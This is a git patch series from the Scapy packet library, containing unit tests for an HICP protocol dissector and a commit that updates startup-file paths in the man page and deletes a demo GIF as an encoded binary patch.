+bind_layers(HICP, HICPReconfigured, hicp_command=CMD_RECONFIGURED) +bind_layers(HICP, HICPInvalidConfiguration, hicp_command=CMD_INVALIDCONF) +bind_layers(HICP, HICPInvalidPassword, hicp_command=CMD_INVALIDPWD) diff --git a/test/contrib/hicp.uts b/test/contrib/hicp.uts new file mode 100644 index 00000000000..12d0e4832b4 --- /dev/null +++ b/test/contrib/hicp.uts @@ -0,0 +1,113 @@ +% HICP test campaign + +# +# execute test: +# > test/run_tests -t test/contrib/hicp.uts +# + ++ Syntax check += Import the HICP layer +from scapy.contrib.hicp import * + ++ HICP Module scan request += Build and dissect module scan +pkt = HICPModuleScan() +assert(pkt.hicp_command == b"Module scan") +assert(raw(pkt) == b"MODULE SCAN\x00") +pkt = HICP(b"Module scan\x00") +assert(pkt.hicp_command == b"Module scan") + ++ HICP Module scan response += Build and dissect device description +pkt=HICPModuleScanResponse(fieldbus_type="kwack") +assert(pkt.protocol_version == b"1.00") +assert(pkt.fieldbus_type == b"kwack") +assert(pkt.mac_address == "ff:ff:ff:ff:ff:ff") +pkt=HICP( +b"\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e" \ +b"\x20\x3d\x20\x31\x2e\x30\x30\x3b\x46\x42\x20\x74\x79\x70\x65\x20" \ +b"\x3d\x20\x3b\x4d\x6f\x64\x75\x6c\x65\x20\x76\x65\x72\x73\x69\x6f" \ +b"\x6e\x20\x3d\x20\x3b\x4d\x41\x43\x20\x3d\x20\x65\x65\x3a\x65\x65" \ +b"\x3a\x65\x65\x3a\x65\x65\x3a\x65\x65\x3a\x65\x65\x3b\x49\x50\x20" \ +b"\x3d\x20\x32\x35\x35\x2e\x32\x35\x35\x2e\x32\x35\x35\x2e\x32\x35" \ +b"\x35\x3b\x53\x4e\x20\x3d\x20\x32\x35\x35\x2e\x32\x35\x35\x2e\x32" \ +b"\x35\x35\x2e\x30\x3b\x47\x57\x20\x3d\x20\x30\x2e\x30\x2e\x30\x2e" \ +b"\x30\x3b\x44\x48\x43\x50\x20\x3d\x20\x4f\x46\x46\x3b\x48\x4e\x20" \ +b"\x3d\x20\x3b\x44\x4e\x53\x31\x20\x3d\x20\x30\x2e\x30\x2e\x30\x2e" \ +b"\x30\x3b\x44\x4e\x53\x32\x20\x3d\x20\x30\x2e\x30\x2e\x30\x2e\x30" \ +b"\x3b\x00" +) +assert(pkt.hicp_command == b"Module scan response") +assert(pkt.protocol_version == b"1.00") +assert(pkt.mac_address == "ee:ee:ee:ee:ee:ee") +assert(pkt.subnet_mask == "255.255.255.0") +pkt=HICP(b"Protocol version = 2; FB type = TEST;Module version = 1.0.0;MAC = cc:cc:cc:cc:cc:cc;IP = 192.168.1.1;SN = 255.255.255.0;GW = 192.168.1.254;DHCP=ON;HN = bonjour;DNS1 = 1.1.1.1;DNS2 = 2.2.2.2") +assert(pkt.hicp_command == b"Module scan response") +assert(pkt.protocol_version == b"2") +assert(pkt.fieldbus_type == b"TEST") +assert(pkt.module_version == b"1.0.0") +assert(pkt.mac_address == "cc:cc:cc:cc:cc:cc") +assert(pkt.ip_address == "192.168.1.1") +assert(pkt.subnet_mask == "255.255.255.0") +assert(pkt.gateway_address == "192.168.1.254") +assert(pkt.dhcp == b"ON") +assert(pkt.hostname == b"bonjour") +assert(pkt.dns1 == "1.1.1.1") +assert(pkt.dns2 == "2.2.2.2") + ++ HICP Wink request += Build and dissect Winks +pkt = HICPWink(target="dd:dd:dd:dd:dd:dd") +assert(pkt.target == "dd:dd:dd:dd:dd:dd") +pkt = HICP(b"To: bb:bb:bb:bb:bb:bb;WINK;\x00") +assert(pkt.target == "bb:bb:bb:bb:bb:bb") + ++ HICP Configure request += Build and dissect new network settings +pkt = HICPConfigure(target="aa:aa:aa:aa:aa:aa", hostname="llama") +assert(pkt.target == "aa:aa:aa:aa:aa:aa") +assert(pkt.ip_address == "255.255.255.255") +assert(pkt.hostname == b"llama") +assert(raw(pkt) == b"Configure: aa-aa-aa-aa-aa-aa;IP = 255.255.255.255;SN = 255.255.255.0;GW = 0.0.0.0;DHCP = OFF;HN = llama;DNS1 = 0.0.0.0;DNS2 = 0.0.0.0;\x00") +pkt = HICP(b"Configure: aa-aa-aa-aa-aa-aa;IP = 255.255.255.255;SN = 255.255.255.0;GW = 0.0.0.0;DHCP = OFF;HN = llama;DNS1 = 0.0.0.0;DNS2 = 0.0.0.0;\x00") +assert(pkt.hicp_command == b"Configure") +assert(pkt.target == "aa:aa:aa:aa:aa:aa") +assert(pkt.ip_address == "255.255.255.255") +assert(pkt.hostname == b"llama") + ++ HICP Configure response += Build and dissect successful response to configure request + +pkt = HICPReconfigured(source="11:00:00:00:00:00") +assert(pkt.source == "11:00:00:00:00:00") +assert(raw(pkt) == b"Reconfigured: 11-00-00-00-00-00\x00") +pkt = HICP(b"\x52\x65\x63\x6f\x6e\x66\x69\x67\x75\x72\x65\x64\x3a\x20\x31\x31" \ +b"\x2d\x30\x30\x2d\x30\x30\x2d\x30\x30\x2d\x30\x30\x2d\x30\x30\x00") +assert(pkt.hicp_command == b"Reconfigured") +assert(pkt.source == "11:00:00:00:00:00") + ++ HICP Configure error += Build and dissect error response to configure request + +pkt = HICPInvalidConfiguration(source="00:11:00:00:00:00") +assert(pkt.source == "00:11:00:00:00:00") +assert(raw(pkt) == b"Invalid Configuration: 00-11-00-00-00-00\x00") +pkt = HICP( +b"\x49\x6e\x76\x61\x6c\x69\x64\x20\x43\x6f\x6e\x66\x69\x67\x75\x72" \ +b"\x61\x74\x69\x6f\x6e\x3a\x20\x30\x30\x2d\x31\x31\x2d\x30\x30\x2d" \ +b"\x30\x30\x2d\x30\x30\x2d\x30\x30\x00" +) +assert(pkt.hicp_command == b"Invalid Configuration") +assert(pkt.source == "00:11:00:00:00:00") + ++ HICP Configure invalid password += Build and dissect invalid password response to configure request + +pkt = HICPInvalidPassword(source="00:00:11:00:00:00") +assert(pkt.source == "00:00:11:00:00:00") +assert(raw(pkt) == b"Invalid Password: 00-00-11-00-00-00\x00") +pkt = HICP(b"\x49\x6e\x76\x61\x6c\x69" \ +b"\x64\x20\x50\x61\x73\x73\x77\x6f\x72\x64\x3a\x20\x30\x30\x2d\x30" \ +b"\x30\x2d\x31\x31\x2d\x30\x30\x2d\x30\x30\x2d\x30\x30\x00") +assert(pkt.hicp_command == b"Invalid Password") +assert(pkt.source == "00:00:11:00:00:00") From 7fced60458435297d2442604014301af32a8f9cd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 31 Jul 2023 20:02:06 +0200 Subject: [PATCH 1070/1632] Scapy terminal improvements (#4073) --- doc/scapy.1 | 8 +- .../animation-scapy-themes-demo.gif | Bin 41319 -> 0 bytes doc/scapy/usage.rst | 19 +- scapy/config.py | 15 +- scapy/main.py | 269 +++++++++++++++--- test/regression.uts | 55 ++++ 6 files changed, 295 insertions(+), 71 deletions(-) delete mode 100755 doc/scapy/graphics/animations/animation-scapy-themes-demo.gif diff --git a/doc/scapy.1 b/doc/scapy.1 index a58643d63c2..6981fdd692a 100644 --- a/doc/scapy.1 +++ b/doc/scapy.1 @@ -51,13 +51,13 @@ increase log verbosity. Can be used many times. use FILE to save/load session values (variables, functions, instances, ...) .TP \fB\-p\fR PRESTART_FILE -use PRESTART_FILE instead of $HOME/.scapy_prestart.py as pre-startup file +use PRESTART_FILE instead of $HOME/.config/scapy/prestart.py as pre-startup file .TP \fB\-P\fR do not run prestart file .TP \fB\-c\fR STARTUP_FILE -use STARTUP_FILE instead of $HOME/.scapy_startup.py as startup file +use STARTUP_FILE instead of $HOME/.config/scapy/startup.py as startup file .TP \fB\-C\fR do not run startup file @@ -82,7 +82,7 @@ lists scapy's main user commands. this object contains the configuration. .SH FILES -\fB$HOME/.scapy_prestart.py\fR +\fB$HOME/.config/scapy/prestart.py\fR This file is run before Scapy core is loaded. Only the \fBconf\fP object is available. This file can be used to manipulate \fBconf.load_layers\fP list to choose which layers will be loaded: @@ -92,7 +92,7 @@ conf.load_layers.remove("bluetooth") conf.load_layers.append("new_layer") .fi -\fB$HOME/.scapy_startup.py\fR +\fB$HOME/.config/scapy/startup.py\fR This file is run after Scapy is loaded. It can be used to configure some of the Scapy behaviors: diff --git a/doc/scapy/graphics/animations/animation-scapy-themes-demo.gif b/doc/scapy/graphics/animations/animation-scapy-themes-demo.gif deleted file mode 100755 index 5a7a8331db88adbd91069dfb7990e39610067b77..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41319 zcmZtNRZtyKw;VIRP%&fB6V&+<*lK0M`2#6T$ER z@#-)P767aopo@!#!wB3d2k7d@$m%o00&w; z954V_16l;cq^dv@4jDckzC9r+xjo=OL`D%003pCP2OuZ_kg-IxaI` zDJ2y?EnWZ+2+-TXegg!ENy%uKNNK;pd}A|(d#nG~Bp%>1vkdS}pNx?&4rrue;-X>t z#>gZ_%V3YiMb-eABmi%9KpZ10_c9E?@J&#bkpSR{Iq zzKY1b0p^;#I6OQFtH2wNi2NH6BPF09D*&RA{U!mzc>@|udHDn-WSL~XTMA;o0V}Y2 z--IMpL6V}pGHP$Ys|9x)U`1MqqQLJHb(JY1rR>g0Mny0UC?GU2u$GZ`ff8Y6Bs zWpyD93&2iXSxpJXygpnG;4y<$*3^N>Fe2H3BW2|6wS@HybY)DOsB8-Kz8eEz9V>kY z0Bmb+%4cL^q-ACU1NL(?lS7GvQFAo5wNZ^V|E%j^Z)Iy`VdsDz$7$za>*!!)?GRCC z4#O4?6xh%J@#{qna?+4q6-YjJ+_G|PEYN@efmmYJndC#lJ0KFVKax7bZLJC-i0WRK z;sN`DJfj9!yMpfULhIEy9$*kgftqXM15s1n>qF zbruwKw*4E(sAZs|E3%_AzrE|3owpji4?*h&*&*uLV)V#edzrMZvi^$&4PT z_1b7tjrmZKh!3$`bM4_wu}Yc#SaaR+{BPrtEdEC|jHO2B94RaQ-e12>1Y;>LjPT*yIpqWqx*cqW zk!mA#hEpba-~ksq2pB+!Fm4X-mwwv3D1x=0O$E-M6^9rJ(rbMa zNWx3I)EN@gkMo&QSC8_7alO+)G3wY>2fxCH3#s%YmG24!V?TzK{Hxd8wGHgO5cz4HYk+lf zOI4`OaqG>T^?AjESv`3~_$j$|0W=EtqO&Uv6$KcCl|E^a8pku?$8P;GUOgmTM%UM_ zc{0*nCvqisZSz2Sb9%T!2FX{ZbshvFj<8-;;J2V3C zB8B%yN=fENi=e_*PFO|Otj|Fsu@odSa&>~J+iKCV#OptA_4IlynIYMlOgrhpUts0~=0%anil2;msd-9A zzZ4Vq9D29B^Z#-+QxhbIbdIwu`6t81pZWD>)*7eTv?T#L&(QMV<-G31^B(APCbmBL z)JSnS{D(ZGtM&) z%=Oa<37t6KtIxCW%;b+KnsQdU4{!Iseujo;Ev zUCg;8u@u~=RkE(3gi8F^TDjC0Kg6JvDncVt1HPy?*%bH|f^UZk)=`HauA-=gKA?gF zw6}5RU1&+$q$Xp$Zt_Uql}HkWj~iEhN|}qJlquiLUb zK65Ef&uN2DxI!vaD^NNrP-pbF!Y0I86{d6U>)$#t_vjM7p+{v;9<@r3%;WGYo`t6N z#A5R{yzhtjf3+;w3Ib>8HECoPhqdpjU9rlj6h6qfBB~Tx)LDvbqs}xWCDrEHGKz;a zFXh(Xm9YJVT5v57DGx-rRg|6{TDw0jfdxeJQ2$mqTs|R(zgMnKk*jn{9$AUCN+SP# zWAlX!KW47<7B@Ef)b>w{-eNs_ZG#+xht$ooW9iR7>#K$C6D`U)p>Eh^re%&SeQOtI zv-r2S6i(?Q>(HnBjtVRW5V4W6W$5;wt6ICj^Fw(A&PK6a-(q(OtWC(UbN4i#y)KTd zKDtI@k8!izw|$vH3>DlS7my>#J=z9#%R}E6^&ReCXsa&NDyfC8RWYJ`Ybo+S)0cw( zZQe3AXO@!1grI+{lb`*Du7PG;})ahDVFV9xvOX8bR zW7IRK;dd{?>uHy|N40D1DfF$`qrWAJna*i+&0{4;$-`RjYjcp^ZR43wk5u=C>#>RnLqN_LR+d1){ zR!T(P)_eLmMJjSUYTooyO506`tPNbL7Iw}V6bZ*ZSOIeZ@^{r}$_Jtn9#gO03nkE{ zLgn?Nk#vaKN=(yP$nI^$I@CmDymgQ3iU*)&hVA4Px(K8But`KJ@jEsg;3b)Y!^QB- zj1;<{_}H?@IpHZ?$iGgC)8ypKyD6{HyqiKyCx*bVBM(?#0ne?PR)nu3`vY*PplE6#3KD7V+OePhIrMpuSJ~k%{Ra z)Q?@~2@bE4Q+xelq2bhaKBF=M51rym0$Mk=vQ8yyy2*B(&Cn)d(z~1@;epom@D2mR80|8k3emY1Vu{fT< zZ=Z+cz^)>1+z0O~fzkXS6fUHoZ_1639Rzj}mx@xZA2~iIv+L76&;!% z_0%6Viz}UH7SM?mz4#Elks>kYVUL0nv*!_WkYcwT?$DAGe)te`fg9UXA9L|r>Wnt_ z%U<+DW9%5R-GEE%SB_wwK?h#RU`T%KOG;erL2T-5j3#0zW0(`b;cm6y^x0Dqxg-uh zHRSlt6nHdJ#z~-ebpgy=dD%6{rCcKu;|UfMW(ML8Z=mr*e>Ki1HCt2M8BA5Nn!w3s z!OivVLY{Ko?550GiG#>Lh=<%Dw^6AUR&o%p>N>B)I*8LmlV0i(5@bsS(Q{Q2ICKEfrru!5Ii^Z5Hl^g^*+(D7 zy}Ig^A;ja*h04?=CI7W#-3={m3U%uJOHDV?Nc--omFAXIgOrh>mCCyd(N$Ae ztBd|J0O=mez;d%}KuPN>PM>|WYkf@VppEK+E?99wlA^HE{^DgVtEV;7Ch>>HZqQ{N zJ=*L*GEq~rj`6a)-7>GVvhO^z#jbzGK(b#Jv$v$Op;C$$cscM#27r}md}>nKp%qG+ zUsP|v44z~=k|S18L`|{B2UKayBS{9$98I?z`7i|=NpEba^c08*e%+50s`%Q)T%#C{&Ee^^EUC}50iA}qUO_mvHuRk1X| z&D@>(QMKnljq)*HnO;rWRhK0kCa@t)iMB9EBhSkvpEIb?Ef}WMg3iiH!k%8TT(dAD zF<%W5>V@n^2%Na-|;^EDemndBn*WgW5>@C9MQ!MG|+*?SMP~utaS)g4aXeI1e>ce&v zn2KtV<5g0XR?7L!^YfAqq`{AJu%tNLGxENqsI)B4t4Q!?(Kk=+CMxf-$3#yp-AC1* zwYREtJfXW{UUS14ThfW^---LM5T+W znoF8y3o9djJq?HTnwPP7RGF}rL^V|2rd9Tv2R6`01Qp5fB6+HE{7xdTqC@r&efsml zn=N~7Vkw^5mA(|rV| zbN#R5lJsNOoa1^jgoY%lUt45SN_dAr`dlw!zIk0iIZyL)JO2a@^x&OYig z$#rHS?C56eNOXm0lt5CrG890Njv>`^c;)!;iZRb#L>u9=v_H1=rJe5G8QQf>)HtwZfnXY40Q{}WHs52Sml+cY&xB*#I-DpRjn698Vd3;Eoed$EE?S9$bnD} z5f*j*V6-TJpe6fc9TX0Q_YT2vmTq zzKk@e4lyU?1dK@Zp0tqt&CwtJ`I}zy6WXZ#@o>?k(LHY`wyMGfWiAd~=gNv&sb?;I zOYaJGQy68SHDjKAMkn}Ybds-Sdc}yYq+p%G#23X?$4hlkHdKkHz~kP0f3H0V-VLX@ z5P8&pKT6_cWqf>hxGGNiHdvh=e=3W13iP5Ea#ZBgT+HD*738J!>N9Ba=%f*$OkR;m zeOmF92%T`*8PPPW9g!{rYj|dPeT&g3529&K3T!2^$J#X_cudoz$xvDXN8t zifbxs1q9a3h7Nnlq-F@bSgz8W<(MXUgw1N(LX>Rv^?WPRJ=DLZTfIefA&yjzBDGkb zco?Hqv-#GA9M2st{no#4gVz}lBN{VkLVM>si{(0+PS?uhtzoxV?Om3PF{j7e(hyqF zP!pma99<(3VvtXmw}TjBZ9Ndv;$LPFh?~BcG+m?Q-DcQOr!CJOj~l&$5x1?DWOH+fSg1WLq35=<8S0}s_^nE zC_%ZytIy24!HlOys6XRO<;9z@`elACs?lGA#G8u`C$PyLnjrgNh z!{&`C?UCZ(4A3rQSj$yJf9ErQujEOF)S5bBXi!YQr3!zgY~^wdLV%7hT_0m(jI6~; zLzq8$U)4j{m$hcI<^Dd260`DBTf!DO^s2+*ZSubxynOnkdS;%g`(|45k9~vCUgUkh zahd3$&vd+!DN&Lk#Ij-Ur5IoLqnM4K=nmSo7QGS=Lc|U`nGS!{9z?evhEVQjKo4`; zmjsB9^7W6rR^zK|j$-l;OV^H^b`ERv*Y21Wgk+EFvvwy7NBfVDTC*g7zn9)1R9QpV z>b2|Whia8EPwSI<1&pKGXTyvj<@)2rMCn~0()6EU4zXr9M3@9qg)n6RG41kbkc zrf4wlqLE}suU+&u?Kths@)rEm!W$=X{mb9F#?w*=t8hU&L4L3%g$0FHZ>TL)Gc8sT zEi+E&Z-yNP*fy}fDb3dDgz)>d5MS{qNUT*vt7aL&^If;_-#9Y_h?Cs3jcLA5k+_Xa zk#AS)Vpy@HYVhwp;x#xzB$4W>l&kjJs$07?$X1~zvf4Rq5V=d;)Ygc%Jajd=)gU?Q z=97*Im+Ol;aho{t>Cbf&+f;B1^~K2Bp)?~Mzhij4w8uDgJeLyEU&nmAP&&JiS$p`| zC?N{XIK%qR5_Y$Ka}#5~&+Y$^qd zn!5Y4m7nXobMjz4ri1aogbk&B(q0L9J@9|=&V1QWE%4lv*giYG(mf?o7`w^R5CFY( zWI`8MUW;7Lfe-Se03g@RPG*7my-@<5h+ftsZsTjfCOJ7H?UZ&;6fTOi%fr+*qcwcR zn3JTVp=1)1UVAW}%ARZ*yRBV$cznK8BAGDk0?LNTa0Ev*F(^&-P`OYpQy>Ii?MSs$ ztwO&qP3>5{Qug%_jzIlH)3>G21@v@4)1^fi`x9%)dG1dXa~Ny^+APybi?f_l@F0i1 zWQPDriR*$Jxo&NAnYJ-<;#bk$U?hJ&oA^`xflPjXC?b*ejm30QTRle+_4@LkKj-5rY8QM0$kG< zhd#6hp7ESGGqEWu;%)N54uUYsYDtP%F;=NS*4fFr8>4iPz$ZbYQPO?dX%q^EcX`tS z`*Sn#1z#+8J_3k8gO3`GnV%hHaRsABWf7+Gp*8Zn=e^$)s?rG2_)l}OifQWLKTfBO zfJ=+}q4e}O)wifMCj}%(rWW%2)`7A)qW-}*W9zteH_A#9RCTH&#)IdhY8XI1|oV%e&zo=Y5<8zW2KgHJ%fnat#8I zs2dG~o?jaj7UEt$l!ii{6**W}eIGW1So*n)^*^m$lq0`e{VMdxdOF9<0kRt!3s;^) z-$~p;t5ubzP;X-XB|pbyp6RZhu>IQ&8ZXk_32Q6^YRJd>M41~9k#d-%OIcp@izB zw-W!_eUnIduFB{a=X2}}V0t!>?KqwlTZRAj{!1xFpN&&%RzKg>*t@dwy_I%i<*!@P zA2Xef-xt{I3?}IDxhr93}ls`N%4yrJ*=@siQ2&DKp{I-b{&rRh<8@YX0`h zQih}J{q~kkbU%7Unk;1_@xfRf21>R^he+&T^p0)jGKG_p0Oa6_;X-<=jwtlr&A}0N zwmXRDFLnOVITgi=;+U#t_v|aOjFxC(!d7n%4lDv0L!xT*N+37J-DDUp+;Rl;n~TJg)0lG0TzEJc zXx41b*3PjNmq>kU%mBR+Lg8eCAEtR)PtuauoTRilW>O3PP{H824r}5g*a=5a(L;=- z(X@*k1U{@NtklPSI;`dlOGoBxSY*mT-U-#GFu!3;E@P9XwqF$+XUlF<@N=U|+rG@u z4lZFDMRDP*Vbya~o^Srkt`tP{LC@d{HZ>HU>R0DBIwQlAT!)xTmb6Rp&W>pOC(p`k z8qlFClrC$-RFRHJE?4H>tm9*UG*5rf+F@dH$0jbVFdzFbvA~(Qhgaqzi8?wrM0VVi z!r2mqRh8}Gk0M3^=OC84QWO&Wk56O=eojx8nlgAXtt+ttQJ0n)o4Ip10XyXjwP-jB z+(mZ*YU)wkB&xT~(D}6TMDQomLUtH}wn8;b2TWa3qj_gdtlMd)d-Rx`hbzrRq3A!_ z(UxZH)+8--aaGv}6$U7(DTT}-wN#9!=$pzthGy7dZ9n2&5}P_8JD@tRnzA&+8me5) zcd`|;xfdd++FNI8VBM5SOcWJ4S+WmGUyUQNO2X%@upJvUqRCzKED4)pVidoW&H7b0 zukMQ6D{1+V>hv+RZ`IG23=rw?CwCJHG}Egu)Ioe!TMVH6@ab~FWS`=^RJCTwi zEc_dp^2rfAsYD%usZOvE6c)O1VjM!gwtj#ANu!4d(J@@cZj33zK!Ad)XJvO&Xs24sE?uCcb&p3IPd_WKn4ka2BvicgmwUZ) zmN05_yl-Ou<4W<-0^b3LOdVqut`o{T)!8WNy+WNN^Zf6;mb;V##S4_j>LuzbBJN9J zuq&YPtED+=thyGxCxy~|R8_Sq3?csUo3fzNAD3QBbA(u=%pQBJ4V(2{Y3z;>O08Ov zui;vlhwM%s9@b_v%=3Hp1!y>;FUxo0Zsx&D**)n%8#unH~ez{W&H=Gk@|^9H)WCff=!KJ9SI|+{gH^npQdCJ zIm}~xaLgfS|8Voe02l7(EXNpk-EHO7h5?X(ldoLH4vhqN6MRZ!V#CVr6zk)Nslc^L zU&bEifF})SrG%~3j6JV%5l2<3bFPffz8l*?(TUsC*r@55lhm#L?-At%o%#|bHHcMn#Oa?eeGJwR(DWP&}*6m zx_eb1;d`i%?KS7_cUz3p$yPlDoc0o9RbX5m%aA-TN|@pv00KNoFyIBGbwZrDp)cSM zAD0yhkhhTqc)Z>c*5UjghmfE*j&Gu?_9XPf?vmFqU!t}L;9oYg`%kM_qc$gcfptZ} zTXT}i!YBKS7IWtqs4wa_I&=-M~YOHq+M3ej(^-Hax} z9Em8{vckuakk_(6M=m4|QqeEyJ-DMCd>I1h8QttIVoSz?Nbn+DVjUZ0g4m3K);auv zio!^$g5TJB;AI5`qaZXdVrj)1_Ts$>rx_rV*~64yVEec4P3&J z`NAA##ZQfUs0jsWXZut~`|o8$`Br-EQwF&6d+9RzrM6m!k42oJif{_5LeOI&{Toqq zbfN1JAx#^UCu0coy35_C<0Ow?)u-RlP#lOGU{n<%T^W?cYWLL@i__tXk3zB36)*lR z`UC#YS!5qCsW4iiP_ZH?3F~We6eu`qs1WG%tQ~p}SC@??o$)D01a~+uksHPfF5hH0 zQDyk_K*Xg{tN`3wt|)PD0tP9aLjg8DE=-`q9D3FXC%DedfI) z%^BT_F5!+gqeZ`EZB=DE#M)}G0{-Ps63R{GLwJ$fp~rB-JD<8Vf;)$7`e)fd8`neh zx^gt|i0HG@G*RtwE1mCGhK}-j%npQLqog*YMhk>wEyc#2g2zVk<>q9?Y03qIWd}!Y zK<{0~F7pOiDdkv6U zo18O!mN?4vQ^?>Q3bUyM%kGo`0!W@6#2P(of`Dkr-nU9Pr}~#~l5H%GR4z$!zT!s8 z?PT(B_HV39w_CwqH{Ct}p$|V}k^`y-60`xC@T*7^{Phn(HTLQF=&K$kIdp&AW=)6$ zM2j)}t28(jPP&+jQ0p0Ak#$m2i_?+ruASngLXImy32qgjr;;R&*6&Z<;M z7M(643eD_NXdBw1IP5OOyyGvGZW<$;ud3jKv4Tln9${Tks2Ss{bxktc1)ac*z!S@Cw(Tx=jPd)*=yX!)zQ11HFV@*=SGt$UxzYoyF5gt2i0@TuS{9EY#AtF)ZurP$tPV-XIfos!{T&CflX0yBve7p zkg7CAsp?zYXlYw_8Cx#zzMfHw=2KrX)fduMEAG^b2dRc8_J3bpi1QGoBAj~4;5R4i zc$-;RwOPBY_=F2uU9HoQ@qwh}i+HK2>hKHy#_HeORyzTyUG*7Iel@5>o+@HjJJ(x3 zHt7*T2(iBb>j)vDH7>ukt-rW#kS(rPNb0@m8Z5GdG7FYS^@8kG;dDqtKLZlCu8=w3 zjgN(KHL_q=s&FiU`OoU#fpGoROl?B+bvo0<5B-KLZSC))L-m0WUd7OXI{i!bP4Xm6 zEWhvAW++teA-MfefgqpNouBHSM1!S22h(1~u3ErBZPS%{`V@%UC=kP$aJ@;|?JwfS zU;Xq?G4&=uksR{dT%mDaIih<%j||$P^Xltz?-^HLE(jo+2SBRu;82I zb#@}UML;RG#FBQF^tRs-sVX+^2-j_3I0VU`nFJ2PD7Xb-9Dq*xcEoB;R0VcNGj`Oe z<7x;IW!JVf+qXv&O|dAyhdqFqkRgPIuz?#U%Kb_@m8OcVrbcVV8tQvUbkegYa)u6j z2SIyliNj#t)V4zPuwbRUN&P+ZD@Db<_hKdD= z9|WmefaebOCCx{pGyuESsHgLS1<*Unfbdu$iq&eD6FGb?| z(}?9souTLWUY=rCW@u;noMmp-VV*#An%gv@t`)dXo0ReJ2O`*u1NF0wmF{QpqH(MI zJ*zaoHC|kSviH`7#MW8uW=d{wigRY^n8&;){ndWf4QEG9cgdoALs`&v$-?6{@n}#z zBwi6W)o9?+#h=4`1NG4@I?QyYPjFVqUmH38H_*+9z{Hb zg6BAQ@T13}Cl$0{qKyDJLAmFdt>2iPE6h{QCA`rG=8>R`~5U>Rl z!T;`!_dwvm$%Z}<#&w2(3y#w~Ll6RXL(ewOPV-X$Vlc4We|qi~K9&U;m$%yzusxtg zzM;08Km@N-pB=cNAb{-wQu{zf@Wk24Ns@g&EtsGYfWNT2fZ8nxL_8Os?;(O=2G8y) z?XIbj5gN`B?IEw!;jnQI$mcd;Lg0y{<>$Wu*1rNhb6Xe^hgFUUm|{D$Du=y(yXUO) zIFB#9Ra+`ok5x<`!-FmJfGJs(J&bQi>Mhx$FhkisB>T{*H(-#vH` z8l2A7J6XlvhG$#av0OaLUvFkP`d3Z&x;>cB0~lb}pmo<^4UZ4@9*G_IkYq^2fMasU zZQ2(Pxce5a@oEGjGwEp}AxJ!6URCJge^h&f#u) z-gRu+V<#LNl^8P4% zPN$QDONzlba)|^+%PY#^M0ySNo1$~7(G=F((_xU3Fia2(Hauw~>Ao-m9Ie%cBLGGu zg8%Rm{>88tF%T3>ZEAT-KUc2Z;B*Q-x@B1SZ8VU;L@>QOTFc_@ncL{x75EE4?0l8F zVA9R`1Q$grB1Q+mi{&B`ql2pqI?Zst*_}Lm{dYJ;qf%+pM5$f(&07EL-vp#Ctd`fKSgJeU zgWqj*3q9a@kOrdATcr6}o>t3%M1HDvzJnbDZ3N<3HIju9S^eEG3lTdY0bF6~KIx&+ z3Ms*SRRnj3z>$fIsf0yu2pd3!vBDD##62G<;)GF4NW)Jc3)#Ysk8HE@46vlX#F(^! zKo$5a1Pb62ZeMbY7OeVb<%oCO)TyRvD0=bbM2Gr5a9k)tFvx`ULc+*9CY_uI2M~FV zceJxc@Sk$NY#@L?iqRSblNn5pWX@W^r!ZS3=UHMKR~57d@h`l_ry%jYf2+T0{=v{{W3oYeTI z7HyV&IoIA#dBd-SwWF|Qd0!pUh`R3ka&5WKq>HaR3@_S)LTLoJca>(AMYbKWgFgWQ zI5H0+2^s=Chnxzl);_$q!N9bOwI0vOpQ4kisVAPa`4vn{OonKS5h(8k?hG;CWnZj( z6@5QL2jAM@w>K!?jV><<|Lxy>zP8&%>#D1ZW$(APei{u`AwB-KBFcxuGC|5Vdqpt~ zk=05;!B;UapOR;&05KNi_WAA2XK5h!6;I61b#cAz!IcGI{T%>mS=YWAsE}s@gIB$N zOeE&>1P)FF5Wg7Oz!!Hs+*TQE1SY^DFK`I=w0?KwcivK4cwp+jErXA z*MzSOH%C2ytB7!uXDJ}WP11fwRmnR2Cx)JTHFynPkoW3OtO0>hn{ptS^YezBA0H+8 z1gvCuJQO}ARF;yG0`lQfsyZRb2AztfWJu1hz&qoGlJ*U`ORqHww2MYXuTsJ(l%!1V z-8y_0zCocjedV7;_!(Crq4EP|c~U$4I@3Ub2m<_u4#A3E(;Y(-#C7ACSO_R~sRlof4 zsUdd@eN8*c?k7i75-QR>vD7=ih)gmgRu+1wnVG)Qw^^QO9>v=bM;LIuTHd)V#S3Ex zLyLs?t!{#sK1h()l}wK0tK?}*6#T2gC(ci%E-(E{Z{$k3|7lyjr&(FZ%$1x^cu*@I zSv_nNSte$wi?NS>KGpSa`P$8p9t@8_6s$EoY51`&TuXJc{G{7ov21Xx3oip7Ui6juZk+Tnwz%taZNqoVJ~ z3i=pO7|5AK@EGfBUMqU7j^mb-4r(u@DzGrFu(~nnlUhe;9P$`gHaUWwg;OcaAX^kn zC8*ldua(^gpTn~rF7_Kc#|=Fh6}h z+iDz|`tBg++bn+!Ma?`WbW*y%XV@A3MkdJ|-kiU?^OXf@*otv5QA(BF;iub}0KZd0 z_Gb##nIN^Dl8XW8r=j=3?sD7*RtNbupHGLMnS6&)s{nhqx_t;J`NvgIpfDgLPL=oN6D?V zukqR4$2E-IR*%2O?#=fKxWz?9pO`vJE{^)uzlv+AN9`=tPPX5gP`+Lq<1sd^AF3+|7>q zr7C(GHIS=E7{kwHTJPG9G3aLVY)6qi#*LB89HN^))$1%K|8Ba`<%_`j`lh3 zc-9C+s-znwLgWT2U=w4ssNyFM*)+UoSF_5U0$y~L7ZWnx%~iIl_>rk*9=7(ao!*bq zg=LiH$j(&uD&eK=!0MbA%!7Wbm^WW}gq0o}zY#8swBHT?YCCn#K6pNbHEn)-J>#GA z-uU#!*~lVr#eg8WPSf!?OhR?tBLXm@Z^0o*2@&8=A+uuk!ub5_>{n8lP)4$s?SDxG ztglDB{tE;9!*G}%5bi#ipvVGXxT83@U`8^G9h|qD$8`}#7{Dk1pci`?%f786shWzU zl!b>02g64Q2^#`1hG6)QLc)BV@K!lum_k@Sop6)c!cbX~dpt4NoGvJx7;2>uXw?zgoYxN|0-h* zK9L7wc^OcslEH2nzPDTY%ny&q2VkO-0hFB|BEU%4y<=a4v54VevPgsnH$?crBrX66 zY2bUq0Bn4Cq9rooqwk`%-*GDO+gxBkhB?SDq{0sy!eSfZ$mGJs0C}e&WdsQUM>i#G 